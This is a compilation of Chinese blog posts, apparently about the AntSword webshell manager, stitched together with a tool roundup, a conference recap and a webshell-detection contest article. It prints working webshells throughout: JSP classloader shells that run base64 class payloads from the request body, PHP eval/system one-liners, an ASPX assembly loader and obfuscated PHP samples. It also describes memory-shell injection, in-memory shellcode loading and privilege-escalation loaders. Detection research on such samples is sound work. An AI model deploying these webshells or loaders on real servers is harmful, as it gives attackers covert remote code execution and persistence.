实战是检验真理的唯一标准。

背景

最近给AntSword新增了一种类型：JSPRAW，主要有以下两点改进：

• JSPRAW不再使用其他参数进行传参，同时支持key-value键值对以及raw传参形式

• 新增toString触发方式，Payload可以不用依赖外部request/response对象，兼容非HTTP场景

接下来以几个实际场景讲讲这个新类型有哪些应用。

具体应用

一键连接冰蝎的JSP Shell

JSPRAW支持如下Shell写法，类似冰蝎，直接发送RAW格式的Payload。

需要注意的是这时候设置密码是不生效的，随便填即可，另外需要在设置里勾选 其他设置-Body设置为RAW模式。如果不勾选的话就是键值对传参形式，可以兼容原来的Shell写法。

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getReader().readLine();
    if (cls != null) {
        new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response});
    }
%>

此时传递的Payload形式如下

既然已经是冰蝎的传参形式了，那么我们只要配合特定的编码器，就可以直接连接冰蝎的Shell了

设置里需要勾选 Body设置为RAW模式

正常连接

抓包可以看到，蚁剑也同样实现了冰蝎的强加密能力。一个Shell，两种用法。

可以再单独写一个解码器对回显包进行二次编码，这里就不再展开

兼容非HTTP场景

在实战中我们会遇到一些非HTTP的情况，例如WebSocket内存马，WebFlux内存马，表达式注入等。因此JSPRAW做了一些改进，以兼容这类利用场景。

在Payload中增加了一个toString的调用入口，可以把执行的回显信息保存到一个字符串里并且return

只调用toString的Shell样例如下：

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getReader().readLine();
    if (cls != null) {
        out.print(new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance());
    }
%>

正常连接

并且equals跟toString可以同时使用，equals拿到request对象后，还可以同时通过toString获取回显。

这样的写法主要是可以兼容一些漏洞利用场景，不需要每次额外去做判断。不理解的小伙伴多写几个利用EXP就明白我什么意思了。

<%!
    class U extends ClassLoader {
        U(ClassLoader c) {
            super(c);
        }
        public Class g(byte[] b) {
            return super.defineClass(b, 0, b.length);
        }
    }
    public byte[] base64Decode(String str) throws Exception {
        try {
            Class clazz = Class.forName("sun.misc.BASE64Decoder");
            return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str);
        } catch (Exception e) {
            Class clazz = Class.forName("java.util.Base64");
            Object decoder = clazz.getMethod("getDecoder").invoke(null);
            return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str);
        }
    }
%>
<%
    String cls = request.getReader().readLine();
    if (cls != null) {
        Object obj = new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance();
        obj.equals(new Object[]{request,response});
        out.print(obj.toString());
    }
%>

正常连接

高版本JDK下的WebSocket内存马

这里举一个例子：高版本JDK下如何连接WebSocket内存马

背景是蚁剑很早就支持了WebSocket类型的内存马，在JDK<=14的时候可以用Js引擎来实现WebSocket内存马的连接Payload，但是从JDK15开始Js引擎被移除，就无法再使用了。

现在有了JSPRAW之后，WebSocket内存马就不存在高版本JDK的兼容性问题了，可以一直支持到最新的JDK22。

测试的时候还遇到了一个小坑，注入WS内存马以后连接发现只能执行第一个包，后面的包都没有回复。

debug了一番发现原因是Tomcat中WebSocke 发送信息默认长度为8kb，而后续的Payload超过了这个大小。

正常的做法是修改web.xml调大这个参数

<context-param>
    <param-name>org.apache.tomcat.websocket.textBufferSize</param-name>
    <param-value>5242800</param-value>
</context-param>

当然我们不可能去修改web.xml了，代码里找一下在哪里调用的，修改掉就好了

ServerContainer container = (ServerContainer) servletContext.getAttribute(ServerContainer.class.getName());
container.setDefaultMaxTextMessageBufferSize(52428800); // 设置为50m
container.setDefaultMaxBinaryMessageBufferSize(52428800);

这样就可以正常连接了

最后

代码已经同步到github：https://github.com/AntSwordProject/AntSword-JSP-Template/tree/jspraw

实战是检验真理的唯一标准，你还有什么建议或者新的玩法呢？欢迎一起讨论:)

阅读原文

跳转微信打开

这次就只谈抽奖

不如关注一波再走？

阅读原文

跳转微信打开

更新日志新增支持jspjs/aspxcsharp类型除内存马/内存马管理模块以外，均支持Tomcat10内存

更新日志

1. 新增支持jspjs/aspxcsharp类型

2. 除内存马/内存马管理模块以外，均支持Tomcat10

3. 内存马注入模块更新:

4. Filter类型：新增PystingerFilter，SorFilter

5. 新增WebSocket类型：CmdWs，CmdBase64Ws，JSPJSWs，JSPJSBase64Ws

6. 不再支持Servlet内存马

7. 内存马管理模块新增Listener、Tomcat-Value、Timer、Websocket 、Upgrade 、ExecutorShell内存马的查杀检测（thx https://github.com/ruyueattention/java-memshell-scanner）

8. Jar加载器模块内存加载功能BUG修复

9. ShellCode加载-JNA模块更新，提高兼容性跟稳定性

10. execPayload模块支持新增额外参数

11. 新增Js引擎执行模块，可用Payload见：https://github.com/yzddmr6/Java-Js-Engine-Payloads

12. aspxcsharp类型支持回显自定义分隔符

13. aspxcsharp新增SharpLoader模块，支持内存加载、远程加载Assembly；支持获取已加载过的Assembly，无需重复上传；支持传递命令行参数，自动获取输入输出。

兼容Tomcat 10

不用多解释

新增WebSocket内存马

新增4中WebSocket类型内存马：CmdWs，CmdBase64Ws，JSPJSWs，JSPJSBase64Ws 注意Websocket的路径不能填/*内存马管理模块中可以看到已经注入成功通过ws协议直接连接卸载内存马也可以打入cmd类型，通过Chrome插件手动发送命令

新增6种内存马检测

增加Listener、Tomcat-Value、Timer、Websocket 、Upgrade 、ExecutorShell内存马的查杀检测 核心代码来自：https://github.com/ruyueattention/java-memshell-scanner

内存加载ShellCode

通过Jar加载器-内存加载，上传ext目录下的loader.jar可以通过Js引擎执行功能先试一下看类在不在，发现确实可以查找到ShellCode加载器模块-加载方式JNA，exploit，弹出计算器，也就实现了内存加载ShellCode的功能

SharpLoader

具体实现可以看之前写的文章：https://yzddmr6.com/posts/as-exploits-sharploader/ 以Efspotato为例

内存加载

选择我们要加载的本地文件即可

URL加载

把exp托管到一个web上，然后填写远程URl地址需要注意的是，这里有一个坑。本来想着可以直接去加载github上面各种编译好的payload，但是发现.net 4好像不支持tls1.2https://stackoverflow.com/questions/47269609/system-net-securityprotocoltype-tls12-definition-not-found那还是自己搭个http的服务吧

通过名称加载

在前面通过内存或者URL加载过的程序集，后续都可以通过项目名来反射加载。可以先通过 获取已加载的Assembly 功能来获取之前所有打进去过的项目名，多个结果以|分割填入你想要反射的Assembly的名称，加上要执行的参数，exploit！成功调用 参数内空格分割符：{} 例如需要执行 cmd /c 'net user' 则填写 cmd /c net{}user即可

联动JMG实现内存马扩展

As-Exploits设计理念之一就是要提供良好的扩展性，这里以 执行自定义Payload 功能举例。虽然插件中内置了一些常见的内存马，但是在实际中我们可能想打入一些别的内存马。这里可以借助pen4uin师傅的JMG项目生成一个蚁剑-Listener内存马 打开JMG，选择内存马类型，中间件类型，设置密码，输出格式选择Base64生成之后把Payload贴进去，执行通过内存马管理模块可以看到已经打进去了一个Listener配置连接的时候别忘了配置敲门的header参数，成功连接

阅读原文

跳转微信打开

下面是原文，不是割韭菜的，给个面子继续看一看催更的小伙伴我们来啦！「404星链计划」上新了~ 本期我们又收集

下面是原文，不是割韭菜的，给个面子继续看一看

催更的小伙伴我们来啦！「404星链计划」上新了~ 本期我们又收集到3个优质项目，一起来看看，文末还有404实验室原创期刊套册送出

01

camille

项目链接

https://github.com/zhengjim/camille

项目简介

现如今APP隐私合规十分重要，各监管部门不断开展APP专项治理工作及核查通报，不合规的APP通知整改或直接下架。camille可以hook住Android敏感接口，并识别是否为第三方SDK调用。根据隐私合规的场景，辅助检查是否符合隐私合规标准。

项目特点、亮点

• 基于实际上架内置了android敏感接口规则
• 第三方SDK识别
• 可指定模块Hook
• 封装hook函数，便于自定义hook接口
• 可识别是否同意隐私政策
• 可导出堆栈报告便于整改
• 持续更新敏感接口、SDK规则、隐私政策及文档

02

rakshasa

项目链接

https://github.com/Mob2003/rakshasa

项目简介

rakshasa是一个使用Go语言编写的强大多级代理工具，专为实现多级代理，内网穿透而设计。

项目特点、亮点

它可以在节点群里面任意两个节点之间转发TCP请求和响应，同时支持socks5代理，http代理，并且可以引入外部http、socks5代理池，自动切换请求IP。

节点之间使用内置证书的TLS加密TCP通讯，再叠加一层自定义秘钥的AES加密，可以在所有Go支持的平台使用。可以在你所有的的Windows和Linux服务器上搭建节点并组成节点群网络。

节点分为普通节点(node)与控制节点(fullnode)

普通节点，无法控制其他节点进行代理、shell等操作 

控制节点，全功能节点

03

dperf

项目链接

https://github.com/baidu/dperf

项目简介

dperf 是一个100Gbps的网络性能与压力测试软件。国内多个知名安全厂商用dperf测试其防火墙。知名开源四层负载均衡DPVS在用dperf做性能测试，发布性能测试报告。

项目特点、亮点

• 性能强大：

• 基于 DPDK，使用一台普通 x86 服务器就可以产生巨大的流量：千万级的 HTTP 每秒新建连接数，数百Gbps的带宽，几十亿的并发连接数

• 统计信息详细：

• 能够输出详细的统计信息，并且识别每一个丢包

• 使用场景丰富：

• 可用于对四层负载均衡等四层网关进行性能压力测试、长稳测试

• 可用于对云上虚拟机的网络性能进行测试

• 可用于对网卡性能、CPU的网络报文处理能力进行测试

• 压测场景下，可作为高性能的HTTP Server或HTTP Client单独使用

关于404星链计划

「404星链计划」是知道创宇404实验室于2020年8月提出的开源项目收集计划，这个计划的初衷是将404实验室内部一些工具通过开源的方式发挥其更大的价值，也就是“404星链计划1.0”，这里面有为大家熟知的Pocsuite3、ksubdomain等等，很快我们就收到了许多不错的反馈。2020年11月，我们将目光投向了整个安全圈，以星链计划成员为核心，筛选优质、有意义、有趣、坚持维护的开源安全项目，为立足于不同安全领域的安全研究人员指明方向，也就是“404星链计划2.0”。为了更清晰地展示和管理星链计划的开源项目，2021年11月22日我们将1.0和2.0整合，推出改版后的「404星链计划」。

目前，「404星链计划」已收录了包括甲方工具、信息收集、漏洞探测、攻击与利用、信息分析、内网工具等多种类共超过60个优质开源安全工具，备受安全行业瞩目与欢迎，成为热门的工具使用与交流阵地。

「404星链计划」项目更新、演示视频等，可查看：

https://github.com/knownsec/404StarLink

如果你的开源安全项目有意加入「404星链计划」，请在 Github issue 中提交项目申请：

https://github.com/knownsec/404StarLink/issues

想要学习和交流开源安全工具的朋友可以加入404星链计划社群，请扫码识别运营菜菜子微信二维码，添加时备注“星链计划”。

往 期 热 门

(点击图片跳转）

阅读原文

跳转微信打开

2023年了，AI都会写编码器了你还不会?

写在前面

  突然想起来距离上次更新文章已经过去好几天了，所以赶紧水上一篇，过几天再看看之前有没有欠的文章没写的。

正文

ChatGPT 一开始是不会写编码器的，需要先教一下，之后就可以正常发挥了。既然是水文就不多写啥了，看我屏幕:

写的是有模有样的，熟悉代码的同学肯定能看出来ChatGPT给的这个是没啥问题的，不熟悉代码就测试一下:

ChatGPT 给的 WebShell:

添加 ChatGPT 写的编码器:

测试连接:

妥!

写在最后

  @Mr6 提了个想法, 再多教教ChatGPT，然后整个接口出来做个插件，直接生成 WebShell 和 编码器、解码器。

不如关注一波再走？

阅读原文

跳转微信打开

emmm 别意外，我们和ISC现在是生态合作伙伴

8月2日，由ISC2022互联网安全大会和HackingClub安全技术社区联合举办的ISC2022 HackingClub白帽峰会在N世界平台顺利召开。

查看回放：https://isc.n.cn/?cid=iscyY054&ncode=C241P&sid=785016

ISC2022 HackingClub白帽峰会再开先河，以“一场关于漏洞的进化论”为主题，从全新的“漏洞进化”视角，同监管领导、行业专家、厂商代表及百余家安全战队和广大安全研究员齐聚一堂，共同探讨网安发展二十年中的演进与变化。

2

干货议题  精彩纷呈

在嘉宾致辞之后，我们迎来了精彩议题演讲。

首先由深蓝互联（北京 ）科技有限公司 CEO、蘑菇云创始人王得金，为我们带来主题演讲《美网络作战能力体系剖析》。

议题分别从网络空间的指挥控制、美网军的作战思路演进、法律框架、管理框架以及技术框架四个方面展开，深度剖析了美国的网络空间作战能力体系。

紧接着由国网工匠、国网信息通信产业集团科研专家、国网思极网安科技（北京）有限公司资深安全专家、物联网安全实验室负责人赵明明，为大家带来演讲议题《企业攻防运营进化论》。

议题通过展示以企业攻防对抗如何促进网络安全实战能力，使大家对高效智能、动态迭代的企业攻防运营体系有了更多认识。

随后，08sec 团队核心成员，工程师Smile带来演讲议题《以管理者视角分析漏洞众测》。

议题中条理清晰地分析了攻击者与管理者（甲方）之间的关联关系，漏洞众测项目成果价值，站在管理者的视角看待漏洞众测项目，以及如何引导攻击者、如何产生价值、产生什么类型的价值等精彩内容。

接着由360未来安全研究院卫星安全专家郝经利为我们带来议题《卫星互联网安全演变》。

议题以卫星网络安全的发展和演变为中心，涉及卫星网络的基础知识及安全风险点，让大家对卫星网络安全有更为深刻的了解和认知。

接下来是固源科技首席研究员李立东带来演讲议题《短距通信协议漏洞挖掘之路》。

议题从应用非常广泛普及的WIFI以及蓝牙协议剖析如何发现短距离网络通信协议的安全漏洞，并为大家分享了不同行业所搭载的通信协议漏洞案例。

之后由四叶草攻防专家郑洋带来演讲议题《红队视角下的安全建设盲点》。

议题从红队视角通过实战案例分析在红蓝攻防对抗中攻击方常见的切入点，以及在防守方部署大量安全设备和进行安全建设后的攻击策略，一个个精彩的实战案例分析令大家意犹未尽。

最后是360安全分析高级专家郭玉晖带来演讲议题《「那些年我们一起抢夺的权限」攻防视角下红蓝交织的技术演进》。

近年攻防演习进行得如火如荼，网络空间中的对抗愈演愈烈。议题展示了那些年大家一起抢夺过的权限，从防御体系和攻击手段两端的变化给大家带来了许多深度的思考。

查

看

回

放

扫码查看完整版精彩视频～

万物互联时代，网络变得更加智能、复杂，我们的峰会也与时俱进。今年ISC2022 Hackingclub白帽峰会首次引入新一代聚会元宇宙平台——“N世界”，监管领导们振奋人心的致辞，安全技术大咖们的思想碰撞都在这里尽情展示，突破传统物理距离，以线上元宇宙沉浸平台的数字新模式，打造出首个数字安全元宇宙白帽峰会。

阅读原文

跳转微信打开

写在前面 本次更新涉及内容较多，实在是没空写文档里面了，请仔细阅读，自行做实验体会。

写在前面

  本次更新涉及内容较多，实在是没空写文档里面了，请仔细阅读，自行做实验体会。如果没搞懂的，可以留言后面再专门写文章来讲清楚。

正文

01

核心

• 修复 PHP/PHP4 当前目录不可写时, bypass open_basedir 失败的 Bug

• 修复 JSP/MySQL类型在表名中有特殊字符时执行异常的 Bug (thx @powersploit)
  

• ❗❗❗新增 PHPRAW 类型, 该类型支持的 WebShell 类似如下代码:

<?php  eval(file_get_contents("php://input")); ?>

          为了方便在团队协作时直连 Behinder3 WebShell, 已内置编码器，仅能支持连接而已，发送Payload不相同

• ❗❗❗新增 ASPXCSharp 类型

        该类型支持的 WebShell 类似如下代码:

<%@ Page Language="c#"%><%  String Payload = Request.Form["ant"];  if (Payload != null)  {    System.Reflection.Assembly assembly = System.Reflection.Assembly.Load(Convert.FromBase64String(Payload));    assembly.CreateInstance(assembly.GetName().Name + ".Run").Equals(null);  }%>

    有关该类型的设计说明, 请参考文章 聊聊新类型 ASPXCSharp

• ❗❗❗新增 PSWindows 类型，与 CMDLinux 类似

基于命令执行的一句话类型, 仅支持 Windows 环境

该类型支持的 WebShell 类似如下代码:

<?php system($_POST["ant"]);?>

有关 PSWindows 的一些注意事项和原理说明, 请参考 新类型 PSWindows 预览

• ❗❗❗JSPJS 兼容各种表达式注入

具体请看 spelbase64、el、ognl 这三个内置编码器样例, 详细请参考 Java表达式注入的武器化利用

02

后端模块

• ❗❗❗支持 WebSocket 连接

  由于 ASP/ASPX/ASPXCharp/PHP/JSP/CUSTOM 类型每次请求时为多个参数，WebSocket连接之后Server端解析会较为困难，所以当前仅支持「RAW」类型: 「PHPRAW」、「CMDLinux」、「PSWindows」、「JSPJS」,未来会支持基于 defineClass 的 JSPRAW 类型

以 wsMemShell(https://github.com/veo/wsMemShell) 项目中的 wscmd 为例:

URL: ws://127.0.0.1:8080/demoendpointPWD: 随便填写连接类型: CMDLinuxEncoder: default (明文, 这个是WebShell端决定的)Decoder: 根据情况自由选择

注意: 由于 antSword 历史设计原因，WebSocket 连接方式暂时只能每次操作都重新建立一次连接，在传输结束后自动与Server端断开

• 支持自定义 Content-Type, 默认是 form

superagent 支持的 type 简写如下, 当然也支持填写全称:

html: 'text/html',json: 'application/json',xml: 'text/xml',urlencoded: 'application/x-www-form-urlencoded',form: 'application/x-www-form-urlencoded',form-data: 'application/x-www-form-urlencoded'

• Fix #307

• 重新规整 modules/request.js 代码结构

• 调整 superagent ignoreHTTPS 注入,避免 npm upgrade之后引发问题

03

数据管理

• 优化了编辑 Shell 信息时，URL后缀发生改变后联动修改「连接类型」功能

• 优化插件快捷设置, 修正过多快捷设置后对UI影响(Fix #303). 现在最多可设置 8 个常用插件

• ❗❗❗新增配置选项「Body 设置为 RAW 模式」

勾选该选项后，只会发送 pwd 键下的内容，不会发送键名（也就是口语中的密码）

目前生效的类型有: 「PHPRAW」、「CMDLinux」、「PSWindows」、「JSPJS」

主要使用的场景如下， 具体有何不同请抓包自行观察:

// 连接类型 CMDLinux, 编码器选择 default 明文// 其它设置里 勾选「Body 设置为 RAW 模式」后可连接<?php system(file_get_contents("php://input"));?>// 与上面作对比// 连接类型 CMDLinux, 密码填 ant, 编码器选择 default 明文<?php system($_POST["ant"]);?>

值得一提的是，ws:// wss:// 这类 WebSocket 连接会自动启用该选项

04

文件管理

• ❗新增 FileHash 计算目标文件 hash 功能

  
  

  该功能目前正在逐步适配所有类型中 , 目前已经适配 PHP/PHP4/PSWindows/CMDLinux/JSP/JSPJS
  

05

系统设置

• 优化了新增Core类型时，编码设置解析逻辑, 现在不需要再改该模块的源代码了

• ❗优化全局代理设置, 代理在设置完后不需要再重启了

06

其它

• 更新纯真IP数据库为 2022/04/20 (https://github.com/out0fmemory/qqwry.dat)

• 升级 superagent 到 6.1.0 (再高的版本需要高版本Electron支持)

• 升级 superagent-proxy 到 v3.0.0

---

长按关注

阅读原文

跳转微信打开

记得在 AntSword新类型 CmdLinux 预览 这篇文章最后立了个 Flag

  记得在  AntSword新类型 CmdLinux 预览 这篇文章最后立了个 Flag (Windows 下纯命令执行WebShell的图形化连接) 一直没解决，今天有了个雏形，主要是证明了这个思路可行。

正文

老规矩，先看视频。(嫌公众号视频不清晰的，可以点阅读原文去 B 站看 720P 的)。

看完视频我们来说说具体的实现。想看代码的直接去 (https://github.com/AntSwordProject/antSword/commit/dc3c1680bae523cd823444dd19933a1a237a2ec2)

因为 AntSword 的历史原因，数据格式的设定都是为脚本语言来设计的，输出相对比较灵活，所以 CMD 类的 WebShell 在使用 AntSword 时最麻烦的事情就是数据格式的输出了。最开始我是想用 cmd.exe 来完成数据格式的切割和拼接。算了不扯这么多了，反正就是 cmd.exe 麻烦的一匹，最后看上了 Powershell

Powershell 的好处都有啥

1. 丰富的内置模块

这个你们应该比我熟太多了，我就不展开了。类比 ls 命令的 Get-ChildItem (简写 gci) ，创建文件时用的 New-Item, 发起 http 请求时的 Invoke-WebRequest 等等，可以极大的方便我们去构造Payload. 除此之外，PowerShell 提供的 Foreach-Object , Select-Object, Where-Object 等操作也是很方便的。

比如 create_file 可以这样来实现:

try {  [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('#{base64::content}'))|New-Item -ItemType File -Force -Path '#{path}' -ErrorAction Stop|Out-Null;  '1';}catch{  '0';}

2. 调用 C#/.Net

这个就有意思多了，因为 PowerShell 的版本原因，有些命令的一些参数在低版本下根本没有，没错我说的就是上面那个 New-Item，在高版本有 -Encoding 参数用来设置写入文件时的字符编码，然而低版本没有，在没有的时候就按系统默认的编码来了。此时就很容易因为字符编码的问题导致二进制数据上传出错。

所以现在写文件的 Payload 长这个样子

$C=[byte[]] -split ('#{buffer::content}' -replace '..', '0x$& ');[System.IO.File]::WriteAllBytes('#{path}',$C);return '1';

直接调用 System.IO.File 的静态方法 WriteAllBytes 以二进制方式写入文件

嗯，静态方法好是好，可是也不够丰富呀。于是 New-Object 这个方法让我看到了。这玩意儿是真好使，举个例子:

// PowerShell$conn=New-Object System.Data.Odbc.OdbcConnection($connstr);
// C#System.Data.Odbc.OdbcConnection conn = new System.Data.Odbc.OdbcConnection(connstr);

看出来区别了吗？基本没啥区别。这样就可以直接把 ASPXCsharp 类型中的 Payload 改改，然后一个新的连接类型 PSWindows 就这么诞生了。

说点需要注意的地方

1. 文件下载只能下载文本类的文件

因为 cmd 类的 WebShell 在使用 Download 的时候，原理是先将文件输出到 stdout 然后再到 response 之后到 AntSword。目前的 Download 请求是直接怼的二进制流，所以在传输的时候是没有经过编码/加密转换的。

于是问题来了，PowerShell 的 Stdout 它不能显示扩展 ASCII 码表的字符。什么意思?比如说一张图片的文件头是 ff d8 ff e0 00 10 4a 46 , 输出到 PowerShell 的 Stdout 后就成了 ff 3f 3f 10 4a 46 49 46

结论: 不在 ASCII 可显示范围内的字符都会给你整成 3F，难受。所以目前的 Download 机制下，下载二进制文件时会不正常。这块后期考虑更改 download 机制来解决。

2. 关于文件权限

文件权限不再是以我们熟知的 0777 这样的八进制数来表示了，而是用 darhs 这五个组合来表示，具体看微软文档中的表示:

而目前仅支持 rhs 这三个属性的修改，当然了，你要想改更多的属性你自己写 powershell 命令去

3. 有关视频当中查询数据库出现的类型转换问题

我后面再抽时间看看怎么整，我现在用的是 GetString方法，没来得及研究那么多。另外像 insert/update/delete 这些语句也是支持的，视频当中没演示，自已去测试环境里试吧。

写在最后

PowerShell 封杀那么严重，实战中有没有用？嗯，不知道，自行解决，我只是学习用。

CMD类的连接，这玩意儿的意义在哪里？嗯，直连RCE漏洞，没有语言的限制 Python/Go/Balabala...，无文件落地，比如像...就不比如了。

就这样吧，Byebye~

不如关注一波再走？

阅读原文

跳转微信打开

安全是一个动态的过程，攻防对抗如同在赛博世界里降妖伏魔，其要义是：取彼之长，补己之短。——伏魔引擎的诞生

本文转发自“阿里安全响应中心”

公众号：阿里安全响应中心“伏魔”赏金 ｜ WebShell检测之「模拟污点引擎」首次公测，邀你来战！

安全是一个动态的过程，攻防对抗如同在赛博世界里降妖伏魔，其要义是：取彼之长，补己之短。

——伏魔引擎的诞生

伏魔引擎挑战赛

注册地时间: 2022.01.10 00:00:00 - 2022.01.24 10:00:00(UTC +8)
比赛时间: 2022.01.17 10:00:00 - 2022.01.24 10:00:00(UTC +8)
主办方:   薪火实验室 & 云安全中心 & ASRC

比赛奖金：1000 RMB/份有效报告（中国区用户）、150 USD/份有效报告（面向海外用户），赛事组在中场会视赛事情况提升奖金额度。
面向群体：国内、国外白帽群体
活动网址：https://security.alibaba.com/online/detail?type=1&id=114&tab=1

点击文末“阅读原文”直达

公测背景：

伏魔引擎挑战赛是阿里云安全“宙斯计划——恶意文本检测挑战赛”的延续，整合了宙斯计划近4次公测活动中，2000+安全专家和白帽子们贡献的对抗样本。
作为Webshell检测的集大成者，伏魔(fomo)引擎集静态检测+AI检测+动态沙箱执行检测等多种综合手段为一体，加之锤炼已近2年，新开放公测的模拟污点执行引擎，给挑战者以更高的赏金、更丰富的靶场、更大的舞台，让更多安全专家齐聚一堂探索Webshell攻防领域高峰。
本届活动，我们同时开通了国内和国外的提交通道，同时还邀请了长亭 RealWorld参赛选手。欢迎海内外白帽共襄盛会。

模拟污点检测首度公测

在打磨检测引擎的过程中，我们逐渐意识到传统静态检测和动态检测的困境。基于上千种不同类型的对抗样本，我们打磨出模拟污点执行引擎，它既可以有效应对高级对抗手法，又能有效降低误报率。

要想理解什么是模拟污点执行检测，需要先了解两个概念。解释性脚本语言的执行过程和污点传播检测原理。

• PHP执行过程

以PHP为例，脚本语言执行的过程如下：

PHP源代码会经过词法、语法的分析形成抽象语法树(AST)，然后解析AST，生成opcodes，最后依次执行opcodes。在这个过程中，所有的源代码都会生成AST。

<?php$fa = new SplFixedArray($_GET["num"]);$fa[0] = $_GET["cmd"];eval($fa->toArray()[0]);?>

• 污点传递

污点分析就是分析程序中由污点源引入的数据，在经过数据流处理，传播到污点汇聚点后，是否符合预设的策略。对于Webshell的定义而言，这个策略就是外部可控的值，能否传递进危险函数，从而达到任意代码执行、命令执行的目的。

• 传统的词法引擎检测方案

PHP源代码会产生AST。通过对AST树进行遍历，可以将$_GET、$_POST等外部可控的变量标记成污点，直至污点传递至危险函数。

但是这种检测方案会产生漏报。以下面代码为例：

<?php@$_="s"."s"./*-/*-*/"e"./*-/*-*/"r";@$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t";@$_/*-/*-*/($/*-/*-*/{"_P"./*-/*-*/"OS"./*-/*-*/"T"}[/*-/*-*/0/*-/*-*/-/*-/*-*/2/*-/*-*/-/*-/*-*/5/*-/*-*/]);?>

遇到代码执行、条件判断、函数调用等操作，在AST上仅仅展示一个节点，无法拿到隐藏的恶意代码信息，也就无法进行检测。

• 面向高对抗样本的模拟污点检测

而模拟污点检测引擎不只是在原始AST树上进行遍历，而是对每个节点进行模拟执行。

这样做的优势是不需要修改原有的zend引擎来适配检测的逻辑，而是专门面向高对抗样本定制的策略。下面我将举个例子，来说明这种方案的优越性。

<?php// a=whoami
$l = strlen(number_format(-0.01));
substr("11system", $l, 6)($_GET['a']);

number_format函数是7.2版本的不兼容变更，这就意味着此webshell只能运行在php7.2以下的版本。如果动态沙箱为7.2及其以上，则无法计算出恶意代码，从而产生漏报。

除此之外，模拟污点引擎还添加了大量推理执行逻辑，当攻击者有意对抗时，会进行污点传播。

模拟污点引擎的本质是尽量让恶意特征暴露出来：

能直接执行的样本直接运行；不能直接执行的样本模拟执行；不能模拟执行的样本继续推理执行。

看完了模拟污点引擎的优越性，下面我们谈一谈传统静态、动态检测方案的困境。

静态检测难以应对未知威胁

纯静态检测是最早的文本检测手段，自诞生起直到现在还在被大量应用。但其实静态检测的效果取决于对文本特征的提取，特征的维度直接决定误报率和漏报率。在这个章节，我们主要讨论纯源码规则的静态匹配，不包括对文本进行提取AST、opcode等特征再进行静态匹配的情况。

主流的静态检测方法具备检测速度快，普适性好（跨平台、跨版本、跨语言等），实现成本低（理论上只要是黑样本，都可以写规则覆盖）的特点；然而，由于缺乏词法、语法的约束，更易产生误报，同时缺乏对抗性和技术壁垒的特点，使得此类型检测算法在遇到加壳、加密、混淆样本时难以检出，无法形成差异化优势。

• 正则表达式匹配易误报

<?phpeval($_POST['shell']);

对于上面的Webshell可以直接写正则表达式进行文本匹配：

(eval|system)\(\$_(POST|GET|REQUEST)\[

利用正则表达式可以很容易对已知恶意样本进行匹配，但缺点也很明显，正则表达式无法进行词法、语法的约束，匹配到的文本不一定能正确的执行。

<?phpeval($_POST['

如上述代码也会被规则匹配到。

• 算法二分类检测难以识别混淆对抗

脚本语言具有较强的灵活性，可以进行编码、加壳等混淆代码操作，躲避正则表达式的检测，从而形成漏报。

<?phpfunction test(){         $a = base64_decode("YXNzZXJ0");         $b = "$_GET[1]";         $a($b);}test();?>

对于上述的Webshell代码，除了写正则表达式检测外，不考虑语义信息，最简单的办法就是用分割符分词，产生词向量。交给算法(机器学习、深度学习)，利用大量黑白样本去数据拟合，从而达到检测的目的。

这种方案存在明显不足，对于0day样本(从未在测试集内出现)的场景，无法检出。而攻防本身就对抗激烈，攻击者会事先构造高对抗的Webshell样本，尝试绕过检测引擎。

动态检测环境依赖度高

当对恶意文本的静态特征提取足够准确时，是较为容易检出的。但攻击者通常会采用代码混淆(加壳、编码、加密)阻碍提取特征，所以就需要动态运行跑出所有的特征，从而进行检测。

动态检测算法技术难度高，可以实现更高级复杂的检测技术，同时因真实执行，恶意代码符合语法、词法约束，不强制干预情况下误报极低。然而，由于真实执行需要对整个运行环境进行仿真和定制设计，存在成本高、检测效率低、兼容性差的问题。

以PHP为例，将phpinfo();代码进行编码并加壳混淆。

可以看到混淆成这样，静态检测是很难写规则的，如只针对特定的函数调用进行匹配，那么就会产生误报。所以需要动态执行，将隐藏的特征暴露出来，从而达到检测的目标。通过PHP VLD插件可以拿到PHP生成的OPCODE以及动态运行下的OPCODE调用。

可以看到该样本实际调用了phpinfo，通过动态运行，可以更加精准的检测样本。但不加干扰的动态执行，会遇到各种对抗的挑战。不难理解，攻击者通过构造各种条件，让动态沙箱无法将样本正常运行下去，从而躲避检测。

• 困境1:缺乏依赖无法运行

PHP、JSP等脚本语言可以通过include语法，引入库函数至当前作用域进行调用。动态沙箱只能拿到当前页面的代码进行运行，从而缺乏依赖，无法正常运行。

<?php/** * Laravel - A PHP Framework For Web Artisans * * @package  Laravel * @author   Taylor Otwell <taylor@laravel.com> */
define('LARAVEL_START', microtime(true));
/*|--------------------------------------------------------------------------| Register The Auto Loader|--------------------------------------------------------------------------|| Composer provides a convenient, automatically generated class loader for| our application. We just need to utilize it! We'll simply require it| into the script here so that we don't have to worry about manual| loading any of our classes later on. It feels great to relax.|*/
require __DIR__.'/../vendor/autoload.php';
